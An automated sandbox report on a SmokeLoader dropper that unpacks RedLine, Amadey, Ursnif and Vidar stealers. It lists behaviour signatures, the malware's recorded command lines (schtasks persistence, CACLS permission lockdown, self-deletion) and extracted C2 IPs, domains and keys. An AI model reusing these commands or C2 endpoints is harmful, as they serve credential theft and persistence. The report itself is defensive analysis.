Edit tour

Windows Analysis Report
q4Z52wRd28.exe

Overview

General Information

Sample Name:	q4Z52wRd28.exe
Analysis ID:	749948
MD5:	a687e1c326c9f03569bbfef53e21c315
SHA1:	1993746a547c67807c1118501e1a7ff9261f7c8b
SHA256:	8c2b385622de52145317d9e740b62edfb74260efab3478810d6c87ca41183f74
Tags:	exeSmokeLoader
Infos:

Detection

Ursnif, Amadey, RedLine, SmokeLoader, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected Amadeys stealer DLL

Detected unpacking (overwrites its own PE header)

Yara detected Go Stealer

Yara detected Ursnif

Yara detected SmokeLoader

Yara detected Amadey bot

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Yara detected Vidar stealer

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Writes or reads registry keys via WMI

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Allocates memory in foreign processes

May check the online IP address of the machine

Injects a PE file into a foreign processes

Opens the same file many times (likely Sandbox evasion)

Contains functionality to inject code into remote processes

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Writes registry values via WMI

Uses schtasks.exe or at.exe to add and modify task schedules

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Injects code into the Windows Explorer (explorer.exe)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Tries to steal Instant Messenger accounts or passwords

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

PE file contains an invalid checksum

Uses cacls to modify the permissions of files

Detected TCP or UDP traffic on non-standard ports

Contains functionality to launch a program with higher privileges

Classification

Process Tree

System is w10x64

q4Z52wRd28.exe (PID: 5708 cmdline: C:\Users\user\Desktop\q4Z52wRd28.exe MD5: A687E1C326C9F03569BBFEF53E21C315)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

A852.exe (PID: 6000 cmdline: C:\Users\user\AppData\Local\Temp\A852.exe MD5: 0E455D9C65E7D53A67C227DCD8D70FB8)

rovwer.exe (PID: 4852 cmdline: "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" MD5: 0E455D9C65E7D53A67C227DCD8D70FB8)

schtasks.exe (PID: 2384 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6140 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 68 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 2016 cmdline: CACLS "rovwer.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 5168 cmdline: CACLS "rovwer.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cmd.exe (PID: 5444 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 5484 cmdline: CACLS "..\99e342142d" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 5608 cmdline: CACLS "..\99e342142d" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

rundll32.exe (PID: 4964 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

B4A7.exe (PID: 3080 cmdline: C:\Users\user\AppData\Local\Temp\B4A7.exe MD5: F96144B1D5B53D93CAADDDADE38DB5E9)

CF35.exe (PID: 4392 cmdline: C:\Users\user\AppData\Local\Temp\CF35.exe MD5: 44A7E13ECC55CE9797C5121B230D9927)

RegSvcs.exe (PID: 5128 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe MD5: 59FCE79E9D81AB9E2ED4C3561205F5DF)

E35A.exe (PID: 4252 cmdline: C:\Users\user\AppData\Local\Temp\E35A.exe MD5: 19A79DADDFAAC09499E79ADE27E756F8)

EB2B.exe (PID: 5512 cmdline: C:\Users\user\AppData\Local\Temp\EB2B.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)

EB2B.exe (PID: 5628 cmdline: C:\Users\user\AppData\Local\Temp\EB2B.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)

EB2B.exe (PID: 5828 cmdline: C:\Users\user\AppData\Local\Temp\EB2B.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)

cmd.exe (PID: 1852 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\AppData\Local\Temp\EB2B.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 5980 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

F771.exe (PID: 5640 cmdline: C:\Users\user\AppData\Local\Temp\F771.exe MD5: DF920AEBFABB8C4CCCEB4DCEAD922ABD)

explorer.exe (PID: 5644 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

explorer.exe (PID: 5656 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 5816 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

explorer.exe (PID: 5876 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 5068 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

explorer.exe (PID: 3932 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

explorer.exe (PID: 408 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

explorer.exe (PID: 4972 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 5248 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

cttgcew (PID: 4220 cmdline: C:\Users\user\AppData\Roaming\cttgcew MD5: A687E1C326C9F03569BBFEF53E21C315)

rovwer.exe (PID: 5372 cmdline: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe MD5: 0E455D9C65E7D53A67C227DCD8D70FB8)

cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": "185.106.92.111:2510", "Bot Id": "New2022", "Authorization Header": "ef6fe7baf59e3191ff2f569e3bf0e2c7"}

Threatname: Ursnif

{"RSA Public Key": "9YTR8AStfTOVxekPy7nye/rJL/CYnuMKiTBMit/N9dFJomCZQw3gdJ20hYjZiaY5PCNTRgc/z2gXfPlfCRRq0/mF+oSBOgliUoJHNN6O1Nl/zAv1hC+MVoITbvAJoj6LnOzFs9h/l3E4DMphz+dHiiDgppDXx4StPfi30EoQByvOIhjndZV3g8kYMJyGj8dxlmi3X9wSz6RHT9/HWCOS/i2phbREwr7oohHwh6mObxVhJVx0tZ18f2U+SsDunGdf1nLcyWHfM0cx6e8zBNRaXlZ1HhTEFzQdz5EF2h+r74n2bFODhb+ozhtKQ1CBEf0hf+5D8mLZuH2C+VOO+s90bjJxpTvGseErYwzAwE2lC4o=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "20", "server": "50", "serpent_key": "izoHlMTDxrB6IFB3", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Threatname: SmokeLoader

{"C2 list": ["http://o3l3roozuidudu.com/", "http://o3npxslymcyfi2.com/", "http://o3b1wk8sfk74tf.com/"]}

Threatname: Vidar

{"C2 url": ["https://t.me/deadftx", "https://www.tiktok.com/@user6068972597711"], "Botnet": "1148", "Version": "55.7"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	INDICATOR_TOOL_PWS_Amady	Detects password stealer DLL. Dropped by Amadey	ditekSHen	0xd86c:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x15608:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x16078:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x1515c:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 0x151c0:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 0xdd10:$s3: \Mikrotik\Winbox\Addresses.cdb 0x190dc:$s4: \HostName 0x19104:$s5: \Password 0x17c08:$s6: SOFTWARE\RealVNC\ 0x17c34:$s6: SOFTWARE\RealVNC\ 0x17c60:$s6: SOFTWARE\RealVNC\ 0x17ca8:$s6: SOFTWARE\RealVNC\ 0x17cd4:$s6: SOFTWARE\RealVNC\ 0x1800c:$s7: SOFTWARE\TightVNC\ 0x18038:$s7: SOFTWARE\TightVNC\ 0x18064:$s7: SOFTWARE\TightVNC\ 0x180b0:$s7: SOFTWARE\TightVNC\ 0x1c43c:$s8: cred.dll
C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	INDICATOR_TOOL_PWS_Amady	Detects password stealer DLL. Dropped by Amadey	ditekSHen	0xd86c:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x15608:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x16078:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x1515c:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 0x151c0:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 0xdd10:$s3: \Mikrotik\Winbox\Addresses.cdb 0x190dc:$s4: \HostName 0x19104:$s5: \Password 0x17c08:$s6: SOFTWARE\RealVNC\ 0x17c34:$s6: SOFTWARE\RealVNC\ 0x17c60:$s6: SOFTWARE\RealVNC\ 0x17ca8:$s6: SOFTWARE\RealVNC\ 0x17cd4:$s6: SOFTWARE\RealVNC\ 0x1800c:$s7: SOFTWARE\TightVNC\ 0x18038:$s7: SOFTWARE\TightVNC\ 0x18064:$s7: SOFTWARE\TightVNC\ 0x180b0:$s7: SOFTWARE\TightVNC\ 0x1c43c:$s8: cred.dll

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.256917988.0000000000970000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000018.00000002.792008341.0000000000870000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000C.00000002.424634553.0000000000891000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1678:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3b4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x7b4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000027.00000000.474180010.0000000000900000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x34:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.340457364.0000000000960000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x7b4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000E.00000002.806199493.0000000000B07000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
0000002B.00000000.482523463.0000000000650000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x34:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
0000000D.00000003.542369400.000000000070F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1E 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000025.00000002.770728847.0000000000131000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
0000000C.00000002.428145666.00000000009B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x21030:$pat14: , CommandLine: 0x18d62:$v2_1: ListOfProcesses 0x18aed:$v4_3: base64str 0x19b81:$v4_4: stringKey 0x16708:$v4_5: BytesToStringConverted 0x15770:$v4_6: FromBase64 0x16edc:$v4_8: procName 0x1725f:$v5_1: DownloadAndExecuteUpdate 0x189fd:$v5_2: ITaskProcessor 0x1724d:$v5_3: CommandLineUpdate 0x1723e:$v5_4: DownloadUpdate 0x178f1:$v5_5: FileScanning 0x16a77:$v5_7: RecordHeaderField 0x16496:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0000000D.00000003.501276183.00000000024E6000.00000040.00000800.00020000.00000000.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x6e:$xo1: <='t$&;3&59t75::; t61t&!:t=:t\x10\x1B\x07t9;01
00000018.00000002.816564354.0000000001209000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
